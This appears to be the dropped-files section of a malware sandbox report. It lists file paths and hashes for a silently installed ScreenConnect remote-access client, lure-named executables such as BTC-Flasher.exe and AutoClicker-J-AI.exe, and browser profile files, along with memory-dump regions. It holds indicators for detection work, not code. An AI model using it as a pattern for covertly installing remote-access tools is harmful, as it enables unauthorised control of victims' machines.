| SHA512 | c2494533b26128fbf8149f7d20257d78d258abffb30e4e595cb9c6a742f00f1bf31b1ee202d4184661b98793b9909038cf03c04b563ce4eca1e2ee2dec3bf787 |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\Client.en-US.resources
| MD5 | d524e8e6fd04b097f0401b2b668db303 |
| SHA1 | 9486f89ce4968e03f6dcd082aa2e4c05aef46fcc |
| SHA256 | 07d04e6d5376ffc8d81afe8132e0aa6529cccc5ee789bea53d56c1a2da062be4 |
| SHA512 | e5bc6b876affeb252b198feb8d213359ed3247e32c1f4bfc2c5419085cf74fe7571a51cad4eaaab8a44f1421f7ca87af97c9b054bdb83f5a28fa9a880d4efde5 |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe.config
| MD5 | 728175e20ffbceb46760bb5e1112f38b |
| SHA1 | 2421add1f3c9c5ed9c80b339881d08ab10b340e3 |
| SHA256 | 87c640d3184c17d3b446a72d5f13d643a774b4ecc7afbedfd4e8da7795ea8077 |
| SHA512 | fb9b57f4e6c04537e8fdb7cc367743c51bf2a0ad4c3c70dddab4ea0cf9ff42d5aeb9d591125e7331374f8201cebf8d0293ad934c667c1394dc63ce96933124e7 |
memory/468-164-0x0000000002810000-0x0000000002846000-memory.dmp
memory/468-168-0x000000001B9A0000-0x000000001BB4A000-memory.dmp
memory/468-167-0x000000001B760000-0x000000001B7EC000-memory.dmp
C:\Config.Msi\e61bbee.rbs
| MD5 | a4d99e18eb5d6536f91557035bc4d722 |
| SHA1 | 1eda16863cd71fa37f9fd01c57acf2465854a3eb |
| SHA256 | 2bc3fd163ef2d30d9774cf6cf456f8065e85901734aad3599f2768b1b7dad6bb |
| SHA512 | 247d6eb1003ba11db1d4bb519865cbb42c222870b7438dd75c55d23b8a2db466518a581939f01f13db10f49eb78613e765e2c1775dea2edc1a6675c98c53f7f9 |
memory/468-163-0x0000000000780000-0x0000000000816000-memory.dmp
memory/468-179-0x000000001BCE0000-0x000000001BE68000-memory.dmp
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
| MD5 | 1778204a8c3bc2b8e5e4194edbaf7135 |
| SHA1 | 0203b65e92d2d1200dd695fe4c334955befbddd3 |
| SHA256 | 600cf10e27311e60d32722654ef184c031a77b5ae1f8abae8891732710afee31 |
| SHA512 | a902080ff8ee0d9aeffa0b86e7980457a4e3705789529c82679766580df0dc17535d858fbe50731e00549932f6d49011868dee4181c6716c36379ad194b0ed69 |
memory/468-180-0x00000000027F0000-0x0000000002808000-memory.dmp
memory/468-181-0x0000000002880000-0x0000000002898000-memory.dmp
\??\Volume{76fc64c0-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{f19b961d-e44e-4914-8582-3227df8cd61b}_OnDiskSnapshotProp
| MD5 | f5ee7f0beb9437868d7f4958187be0f5 |
| SHA1 | e642000a724c2001fcc756e2649708ecedc4d52b |
| SHA256 | 769057f2d1650a7ba23d15dc998cea8ea897588073932b4ebc32b2f0357efe71 |
| SHA512 | d5bfb556209463ada4f462227c82fcfb6dcbf8b66e42710509e090e040a5bf6394088671a28b7113c2ee88a3b83be539a0f035de33714be872dc9d3ef2b4d9bd |
\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
| MD5 | fedabdc2e20a56b5500f3f4dab4c6d1a |
| SHA1 | 467ea9ce7c416af86c1cccdf878e92c0f4b2330d |
| SHA256 | 30287b8fad94c9fc24e5a9bea882d32f4b714cf3ec4d6af660e2c40dc161f270 |
| SHA512 | eadb0dd8381300ebd87c92524e53a5cd7e33bfb79541a1eb9a9ca6bdb1167be60b968d32e9ec608254002c3df69f63a50484dbcadd45f2979d918bb3f8533242 |
C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
| MD5 | e7bb9711b76f9622fc549ea5db60a70e |
| SHA1 | 609b26634aa86c2fa30768ce349fce2510d008ed |
| SHA256 | 552d6bc9dd165279c330cf381ceab185b407878ea81393cf2bae437ebecd9dbe |
| SHA512 | 4d66e58f5495ec318ef91668bd158c673b0508afabfa9c218a83f12cf8e909da935c2c5f20d600870af86a2c86205772a3f941c00a64500cd22c9ff1613b2a13 |
C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi
| MD5 | 0952d023989ab1335bb102c3ccbe6560 |
| SHA1 | d85d01996ccdee66ef2e2ecde7396010302084cf |
| SHA256 | c9a2223eece64c9a9bda6698ee41fd7884905cd4aebfd4e43d33bb6da15eb8b7 |
| SHA512 | 65599bb24480b22ad6dea24c841e248d2511dc49aaf90f1a3af61247504c491dbac55552e02b8fcfc7258f6aae5794130c72da5238a33886dbf78c056a7e5f9d |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
| MD5 | 26c503e0811477d4790fa3b9260e6bc3 |
| SHA1 | cd89a648ea30052b34d2ce993433967adfdf5b74 |
| SHA256 | 76ced2c52d647683572ceac0687933e96e198b5a6f998457fa334763cc1ef978 |
| SHA512 | 125678cee78705f07e56d69ffbf08fd616dac3ea3f2ff34f4e703b0ec2329da575e5b30de4494639baa17d8e68343ceb9a4e99e9edcaf4cfad516a715a904874 |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsBackstageShell.exe
| MD5 | afa97caf20f3608799e670e9d6253247 |
| SHA1 | 7e410fde0ca1350aa68ef478e48274888688f8ee |
| SHA256 | e25f32ba3fa32fd0ddd99eb65b26835e30829b5e4b58573690aa717e093a5d8f |
| SHA512 | fe0b378651783ef4add3851e12291c82edccde1dbd1fa0b76d7a2c2dcd181e013b9361bbdae4dae946c0d45fb4bf6f75dc027f217326893c906e47041e3039b0 |
C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsFileManager.exe
| MD5 | 1aee526dc110e24d1399affccd452ab3 |
| SHA1 | 04db0e8772933bc57364615d0d104dc2550bd064 |
| SHA256 | ebd04a4540d6e76776bd58deea627345d0f8fba2c04cc65be5e979a8a67a62a1 |
| SHA512 | 482a8ee35d53be907be39dbd6c46d1f45656046baca95630d1f07ac90a66f0e61d41f940fb166677ac4d5a48cf66c28e76d89912aed3d673a80737732e863851 |
C:\Users\Admin\AppData\Local\Temp\MSIE713.tmp-\CustomAction.config
| MD5 | 6f52ebea639fd7cefca18d9e5272463e |
| SHA1 | b5e8387c2eb20dd37df8f4a3b9b0e875fa5415e3 |
| SHA256 | 7027b69ab6ebc9f3f7d2f6c800793fde2a057b76010d8cfd831cf440371b2b23 |
| SHA512 | b5960066430ed40383d39365eadb3688cadadfeca382404924024c908e32c670afabd37ab41ff9e6ac97491a5eb8b55367d7199002bf8569cf545434ab2f271a |
memory/568-292-0x000000001B740000-0x000000001B812000-memory.dmp
C:\Config.Msi\e61bc05.rbs
| MD5 | 50a254de7b3b707867daefe5f4ccf047 |
| SHA1 | 33fecee01d584375a511e99940eecd1176c1a957 |
| SHA256 | c34f8e70fee2fdfd8771c04732556d6494e224e9eb24ebe510c130b89d9bfb23 |
| SHA512 | 71e6acf6a4828cd7174ddc73f8cce6d4958baf97a0b22608d4280a95983e1c78ba9a66be0fff627c1c3772c08a1bb0dc9a80e1201a8df00121e297e52744f784 |
C:\Config.Msi\e61bbf3.rbs
| MD5 | cd2ca29b6ef7f86a48ad3f1e0ba219eb |
| SHA1 | f383c325bd60fd01aa3565b0cb960742fba06e13 |
| SHA256 | 6e3b03462855f937f87bfbf8513cf0142eac64fac23b697e0040864edf45183d |
| SHA512 | db400f8cbff83e53b00a48ddd2a66fe2cf15c0d48676e9ab1a6a8da834fd971f36c47868e9ab1a2fc2cf279e8644e53d6556ead494e53a5e48650c01e502648e |
C:\Windows\Installer\{3E38E495-441B-B71E-19A8-658C81C8B012}\DefaultIcon
| MD5 | f34d51c3c14d1b4840ae9ff6b70b5d2f |
| SHA1 | c761d3ef26929f173ceb2f8e01c6748ee2249a8a |
| SHA256 | 0dd459d166f037bb8e531eb2eceb2b79de8dbbd7597b05a03c40b9e23e51357a |
| SHA512 | d6eeb5345a5a049a87bfbfbbbebfbd9fbaec7014da41db1c706e8b16ddec31561679aae9e8a0847098807412bd1306b9616c8e6fcfed8683b4f33bd05ade38d1 |
memory/1028-323-0x0000000000B00000-0x0000000000B22000-memory.dmp
C:\Config.Msi\e61bc07.rbs
| MD5 | b3f023cccdc9a6177207b9db7a66ff32 |
| SHA1 | 73a11cef1495fe9a6a7c27704576703303ed2a02 |
| SHA256 | a3927a21dd40f682e2ae097c03ebb7a0359cbd5214e1096a3ffd98b4f01b8cdc |
| SHA512 | d6241681c98e63f1309996c70fe2c022c4079884a5ed5267f20ad2984edef1f4af5aa71c1afaa2dcb70bf03693403e5343f546f798f966cc25fcee79b8fbbb36 |
C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
| MD5 | 4c9e0721e37503107c9fa2a53fecd716 |
| SHA1 | 582baf51669d7cd17fabc3e724530b23de32d312 |
| SHA256 | 21562797103d497b3f17defd8cde542197089e5adfef9cfe73957eec1b8de565 |
| SHA512 | e4f752f244956ece9f674cd6fb8c660ea2b4f79ff0871d85a2547ffb31fb6d0a4c982e9594fea94ec267003bb7539975c5af3da2643ca40856747f1bb2d02bcb |
C:\Config.Msi\e61bc0b.rbs
| MD5 | e34190ddb4950e4a4d7511d464e810d6 |
| SHA1 | 4d7c3b9af84841aaf2546b7da1f44182dca6af97 |
| SHA256 | 1999a57d75eceffa77e77f65582adf164fefa9e5086795e1141cf064f99ec52d |
| SHA512 | 64f98f9abb5c15491474842a4ceac274aa71e8fa3cd783a78969e70cb6aa06f954067aae8dc12d12c3a158710c36e02d1a172c691561403946d8d8b423cc5fc1 |
C:\Config.Msi\e61bc1d.rbs
| MD5 | 4d21c754798d330f1e780fc870787774 |
| SHA1 | 8ad355e49cbcad3b79e1f4a3064b27c3732f3dc2 |
| SHA256 | 147380d525349ba805f360825c93822d2eaddb1edbaaa69c54ef91f426bbf83b |
| SHA512 | afe3cef8e693e05230b08884f49a8301524e90eea77b5b316498840c8bc8e29c2887576cd8ebe62237244b9b6f8d0d163d17697dcd59ea285e022e6f4c08a63b |
C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
| MD5 | a921a2b83b98f02d003d9139fa6ba3d8 |
| SHA1 | 33d67e11ad96f148fd1bfd4497b4a764d6365867 |
| SHA256 | 548c551f6ebc5d829158a1e9ad1948d301d7c921906c3d8d6b6d69925fc624a1 |
| SHA512 | e1d7556daf571c009fe52d6ffe3d6b79923daeea39d754ddf6beafa85d7a61f3db42dfc24d4667e35c4593f4ed6266f4099b393efa426fa29a72108a0eaedd3e |
C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.Compression.Cab.dll
| MD5 | 77be59b3ddef06f08caa53f0911608a5 |
| SHA1 | a3b20667c714e88cc11e845975cd6a3d6410e700 |
| SHA256 | 9d32032109ffc217b7dc49390bd01a067a49883843459356ebfb4d29ba696bf8 |
| SHA512 | c718c1afa95146b89fc5674574f41d994537af21a388335a38606aec24d6a222cbce3e6d971dfe04d86398e607815df63a54da2bb96ccf80b4f52072347e1ce6 |
C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp-\Microsoft.Deployment.Compression.dll
| MD5 | 4717bcc62eb45d12ffbed3a35ba20e25 |
| SHA1 | da6324a2965c93b70fc9783a44f869a934a9caf7 |
| SHA256 | e04de7988a2a39931831977fa22d2a4c39cf3f70211b77b618cae9243170f1a7 |
| SHA512 | bb0abc59104435171e27830e094eae6781d2826ed2fc9009c8779d2ca9399e38edb1ec6a10c1676a5af0f7cacfb3f39ac2b45e61be2c6a8fe0edb1af63a739ca |
C:\Config.Msi\e61bc1f.rbs
| MD5 | 89dac159850c745923092c97ae9bbcd8 |
| SHA1 | 26538f30332978441872b9dbe952e55aebdb0ec5 |
| SHA256 | e1da5782ab35772c1601c04c83b9947f3a47c0518242ed17e1154f230e9121ea |
| SHA512 | 2da669d2b3ac17472c9d0bd240760b0a8deb47cb1098dab5a5e039823655139ce08187cc47450e9a1debf38187fef2ecd98a106be20a77ddf82210788d21fbe6 |
C:\Config.Msi\e61bc23.rbs
| MD5 | 4b4f009ca3bf6b1ef85edc22d8d6d36d |
| SHA1 | 15a754da0aff7a8088916873bd040260b130bf09 |
| SHA256 | 5cdc1f976a01ec8311871e3a4c6de4c897bb022a7dd077aeaf007cb4f35c0914 |
| SHA512 | ff5c77d8ee1cbd44944086f2f4b4a2477853c098aa8878d1647f91180a1217d20dd14cde7a6104165612f8d2e5f5e3adfa6973397210a1541e322c6debe31f67 |
C:\Config.Msi\e61bc35.rbs
| MD5 | f79920d2d8e3a78f41d9d2149cec8270 |
| SHA1 | f46181dc1235657e8b5a95894e021e1fdd00994a |
| SHA256 | c989cc33e3fd1f3bd979ee68b03580e4a25ae1779ca8eb3312a88a7fa6583cd4 |
| SHA512 | 961185fbcb218ff47cf7e3db9d38066cae1b774d22e1aa88048de9840ed7aae536a57a9e5633648c08dff8e12ad7117198b2894da5b72102570cd5cf393d99db |
memory/4768-640-0x000001E1D0D60000-0x000001E1D0D6A000-memory.dmp
memory/4768-641-0x000001E1D0D90000-0x000001E1D0D98000-memory.dmp
memory/4768-639-0x000001E1D0810000-0x000001E1D083C000-memory.dmp
memory/4768-643-0x000001E1EC400000-0x000001E1EC4A8000-memory.dmp
memory/4768-644-0x000001E1EAE90000-0x000001E1EAEB2000-memory.dmp
memory/4768-645-0x000001E1EAE60000-0x000001E1EAE74000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe
| MD5 | c6ddc5c9dad56fd85bf6199b38c09120 |
| SHA1 | 299bc508a4c1a603789b7c5aa166713b3428f2e0 |
| SHA256 | d0ebe35a902832fbd856e5a03d770c5cf1d7ba9c9418a51bda6d9b0698771841 |
| SHA512 | 41668f9c2231769aa8c919166b964d0161b2cde4c0efd175b5f3bdb25906496ed045366fb1c25439663e98f483f43bc4e56fa4891abd3cd5abb3bbbfdcf69e40 |
memory/2356-657-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d24eb2a9140d14bea6ab2e3618d4ad51 |
| SHA1 | 9839c06696255719a27823f0456e190a61b0d836 |
| SHA256 | 76f12449d962e2a9edb79b87dc952b63996e175c56876e82d8b278f1ca4a967b |
| SHA512 | eb9b1ccb8ec4555575b1bb30067f7e7ebac792853595d201d1277722f139828fb780cbdf2a6230411c59d5782b01990c359ff62f24a8857387f292c30cc802f5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c0521de85014ffb439beaef46a04d57a |
| SHA1 | e4030babf5f4ebebce667e1bdfa5930a01ac96bb |
| SHA256 | 5ff0c55032b921b8de62351bac8575b4db7e03594e0e478055f2f5db8a8651e2 |
| SHA512 | fab681972a0667cb0edb14dec55154e42d242cb92e4f84ceebbd970cae1777e3c57ab55b1913b0e652f87f02aeffe9f14c918727b31588e49860840c95f0e9ea |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bacea279f54fcc511936d06297e3832b |
| SHA1 | a64d80fe6e611b601cd718866d82d06303ed8476 |
| SHA256 | fd003845711559e5b86c5df5dd90f1add3a53fe6b386c5e5bdbfbd6465a04755 |
| SHA512 | a3342af65ecbd5e500e15d05c7ad368e9ea9077cf8221f1637a2835adae8f27c9eba382649c50985c0043c902789d056ad4ff72ea76c4d3d4d4e745e8ddbca63 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1
| MD5 | f50f89a0a91564d0b8a211f8921aa7de |
| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
C:\Config.Msi\e71f62c.rbs
| MD5 | c000f39d56eb350c9c66d3146d6c0375 |
| SHA1 | 6cc04b0915084abe87177fc73c3d4ff1195f9643 |
| SHA256 | ee65e24be612d3bbf84b6311c751f1685f644534222edf7c5af701fbeb2410c4 |
| SHA512 | a89adafcf8a9791723b4930e521a0f7c23e9e25369d3a6738f22913e3e43f63a1a2ad2ac1c2848bbbd8f1e941f25f6eefca3b6d032dec64f748cd1724bd5288d |
C:\Config.Msi\e71f63e.rbs
| MD5 | 9a7128d070a655b58558b0471f51548a |
| SHA1 | 6f3f684c456c5c221d943c4675cff10e5b5871fc |
| SHA256 | 190d0def9ddf074d6d325827b0180c5aa1e7708cc342da9ab8d9e132148ca7da |
| SHA512 | 076d822b38147a3451c39264bfe154203ab46a847f7be3f1d6e045701689a0831676c49316c2c494a2e7347bd8cc0c1430856a01cb0f94a6eb749f4350457b91 |
C:\Config.Msi\e71f640.rbs
| MD5 | 244989019b77282995f7076013469393 |
| SHA1 | dc42117b8d02a8e124493267a3dc440b8c5cef1a |
| SHA256 | 810c0dc41501065648203b4192267eefdd44f9e460df0b05a169051a57e14088 |
| SHA512 | e12197a73439d0e3b2060e9bde8cdcd995a6f56cca59e2aaaaf20c6b23df98e6d408444539a11a4d38e7dffe1d688c7a8169ec3167ceea5f34f4ba128f044acb |
memory/2356-926-0x0000000000400000-0x0000000000422000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\main.exe
| MD5 | c1ab7781370290e0f7d8ea98705e8c84 |
| SHA1 | bf2cc6fe244d17f05d0185d17758fd726562afee |
| SHA256 | 17bc5b41b35d894b37224e5daa66e2c7326e10a8309e299af122c6602afc953e |
| SHA512 | f28465ca2cad0c3476a867acad8f2d530fcddf8aaa83f5003566781e727846192a5519fce89d597d20b9291e8b462f4c34124ce6cfca95387b7547368892f37f |
memory/3268-944-0x0000000000210000-0x00000000006A3000-memory.dmp
memory/3268-946-0x0000000000210000-0x00000000006A3000-memory.dmp
C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.59\Installer\setup.exe
| MD5 | 1b3e9c59f9c7a134ec630ada1eb76a39 |
| SHA1 | a7e831d392e99f3d37847dcc561dd2e017065439 |
| SHA256 | ce78ccfb0c9cdb06ea61116bc57e50690650b6b5cf37c1aebfb30c19458ee4ae |
| SHA512 | c0e50410dc92d80ff7bc854907774fc551564e078a8d38ca6421f15cea50282c25efac4f357b52b066c4371f9b8d4900fa8122dd80ab06ecbd851c6e049f7a3e |